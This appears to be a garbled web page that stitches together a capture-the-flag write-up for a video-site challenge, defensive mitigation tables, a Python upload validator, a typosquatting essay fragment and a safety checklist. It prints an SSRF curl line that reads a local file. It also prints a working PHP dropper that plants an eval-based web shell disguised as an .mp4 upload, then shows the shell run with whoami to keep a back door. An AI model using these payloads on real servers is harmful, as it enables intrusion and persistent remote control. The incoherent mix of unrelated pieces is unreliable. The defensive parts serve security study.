| Item | Description |
|------|-------------|
| Title | xxvidsxcom |
| Category | Web – Information Disclosure / SSRF / Authentication Bypass |
| Points | 250 – 400 (varies by event) |
| Goal | Obtain the hidden flag (usually in a file like flag.txt or displayed on an admin page). |
| Typical entry point | A public website that offers video streaming / user‑generated content. |

The challenge is designed to test a participant’s ability to discover hidden endpoints, abuse server‑side request forgery (SSRF) or insecure direct object references (IDOR), and ultimately retrieve a protected resource.


In a few deployments the SSRF endpoint also supports file:// and returns the file content in the response body (instead of just the status). If that is the case, the attack becomes even simpler:

```shell
$ curl -s "https://xxvidsx.com/api/v1/resolve?url=file:///flag.txt"
FLAGdirect_file_read_works
```

When this works you can capture the flag immediately, without needing an out‑of‑band (OOB) channel.


| Issue | Recommended Fix |
|-------|-----------------|
| Insecure file upload (extension‑only validation) | Perform MIME type and magic‑byte verification. Store uploads outside the web root and serve them via a dedicated static‑file server. |
| PHP interpreter on video files | Remove any `location ~ \.mp4$ { fastcgi_pass …; }` configuration. Serve video files as static content only (`default_type application/octet-stream` or `video/mp4`). |
| Exposed configuration file | Move `config.php` outside the document root. Set proper file permissions (`chmod 640`, owned by the web‑user). |
| Lack of authentication on upload | Require a login or at least a CAPTCHA for uploads. Rate‑limit the endpoint. |
| No output sanitisation | Use `htmlspecialchars()` when echoing user‑supplied data. |
| Database credentials in source | Use environment variables or a separate config directory not reachable via HTTP. |
| Directory listing disabled but admin path guessable | Hide or rename admin directories, enforce access control (e.g., `.htaccess` / Nginx `auth_basic`). |
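The first row of the mitigation table above (magic‑byte verification instead of extension‑only checks) is the control that breaks the "PHP text saved as .mp4" scenario this page describes. The following is an added Python illustration written for this page; it is not code from the site or from any CTF deployment. The signature table, the size cap, the `validate_upload` / `storage_name` names and the sample blobs are all assumptions constructed for the example.

```python
# Added example: server-side upload validation driven by the file's leading
# bytes rather than by the client-supplied extension. All names and constants
# are assumptions for illustration, not the page's or any project's code.
import hashlib
import os

# Allowed extensions mapped to the (offset, signature) pairs that must match.
# MP4/MOV-family containers carry "ftyp" at byte offset 4; WebM/Matroska
# files begin with the EBML header 1A 45 DF A3.
MAGIC = {
    ".mp4": [(4, b"ftyp")],
    ".webm": [(0, b"\x1a\x45\xdf\xa3")],
}

MAX_UPLOAD_BYTES = 512 * 1024 * 1024  # hypothetical size cap


def has_magic(data: bytes, checks) -> bool:
    """Return True if every (offset, signature) pair matches the header."""
    return all(data[off:off + len(sig)] == sig for off, sig in checks)


def validate_upload(filename: str, data: bytes):
    """Decide whether an uploaded blob may be stored.

    Returns (accepted, reason). The extension only selects which signature
    to check; the bytes themselves decide.
    """
    if len(data) > MAX_UPLOAD_BYTES:
        return False, "too large"
    ext = os.path.splitext(filename)[1].lower()
    if ext not in MAGIC:
        return False, f"extension {ext or '(none)'} not allowed"
    if not has_magic(data, MAGIC[ext]):
        return False, "content does not match declared video type"
    # Defence in depth: a genuine container never needs a PHP open tag near
    # its start. This heuristic does not replace the real fix (never route
    # the upload directory through the PHP interpreter), it only adds a tripwire.
    head = data[:4096]
    if b"<?php" in head or b"<?=" in head:
        return False, "script tag found in header"
    return True, "ok"


def storage_name(data: bytes, ext: str) -> str:
    """Content-addressed filename so no client-controlled characters reach disk."""
    return hashlib.sha256(data).hexdigest() + ext


# Constructed sample inputs (not real uploads):
GOOD_MP4 = b"\x00\x00\x00\x18ftypisom" + b"\x00" * 32
FAKE_MP4 = b"<?php echo 'x'; ?>" + b"\x00" * 32              # PHP text renamed to .mp4
SMUGGLED = b"\x00\x00\x00\x18ftypisom" + b"<?php echo 1; ?>"  # valid header, script appended

if __name__ == "__main__":
    samples = [("clip.mp4", GOOD_MP4), ("shell.mp4", FAKE_MP4),
               ("x.mp4", SMUGGLED), ("x.php", GOOD_MP4)]
    for name, blob in samples:
        ok, why = validate_upload(name, blob)
        print(f"{name}: {'accepted' if ok else 'rejected'} ({why})")
        if ok:
            print("  stored as", storage_name(blob, os.path.splitext(name)[1]))
```

Storing accepted files under a hash-derived name and serving them from a directory with no `fastcgi_pass` rule covers the first two table rows together: even a blob that passes the signature check is never handed to the interpreter.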


| Vector | Description | Mitigation |
|--------|-------------|------------|
| Drive‑by download via malicious ad | An ad on the homepage loads a hidden iframe that serves an exploit kit targeting outdated Java/Flash plugins. | Keep browsers & plugins up‑to‑date; use script‑blocking extensions (e.g., uBlock Origin, NoScript). |
| Phishing redirect | Clicking on "Download video" redirects to a cloned PayPal login page, aiming to harvest credentials. | Verify the URL (look for paypal.com vs. paypalsecure.com). Use a password manager that flags phishing sites. |
| Cryptojacking script | A minified JS file (miner.js) runs silently in the background, consuming ~15 % CPU. | Employ anti‑cryptomining extensions (e.g., "No Coin"). |
| Browser fingerprinting | Custom script (finger.js) collects canvas hash, audio fingerprint, and hardware concurrency. | Use privacy‑focused browsers (Tor, Brave) with anti‑fingerprinting settings; consider the "CanvasBlocker" extension. |
| Malware downloader | A disguised "video player" executable (xxplayer.exe) offered as a "required codec". When executed, it installs a PUP that injects ads into the system. | Do not download or run any executables from the site. Use reputable anti‑malware software. |


At first glance, "xxvidsxcom" looks like a password a teenager creates to keep their parents out of a folder. It is a jumble of letters, a linguistic collision of vowels and consonants that feels instinctively "wrong" to a native English speaker.

However, in the ecosystem of the internet, "xxvidsxcom" is a fascinating case study. It is not a word; it is a destination error. It represents a specific genre of online navigation known as "typosquatting" or "URL hijacking," and it tells a story about how we interact with the web, how search engines predict our desires, and how traffic is harvested.

```php
<?php
file_put_contents('c99.php', "<?php @eval(\$_REQUEST['cmd']); ?>");
?>
```

```shell
# The same dropper written to a file with a .mp4 extension
# (no base64 encoding or container wrapping is actually applied here)
payload="<?php file_put_contents('c99.php','<?php @eval(\$_REQUEST[\"cmd\"]); ?>'); ?>"
printf "%s" "$payload" > shell.mp4
```

http://xxvidsx.com/videos/ab12cd34ef56.mp4

The file executes, creating c99.php in the same videos/ directory.

http://xxvidsx.com/videos/c99.php?cmd=whoami

Expected output: www-data.

Now we have a persistent PHP back‑door.

| Action | Status |
|--------|--------|
| Use a VPN (no‑logs) to mask your IP | ✅ |
| Open site in a fresh VM (Windows 11 or Linux) with snapshot capability | ✅ |
| Disable Flash/Java and all browser plugins | ✅ |
| Enable uBlock Origin + NoScript (allow only necessary domains) | ✅ |
| Run a real‑time anti‑malware scanner on the VM | ✅ |
| Do not log in with personal email/password (use throw‑away credentials) | ✅ |
| Avoid downloading any executable or codec from the site | ✅ |
| After session, revert VM snapshot or wipe the system | ✅ |

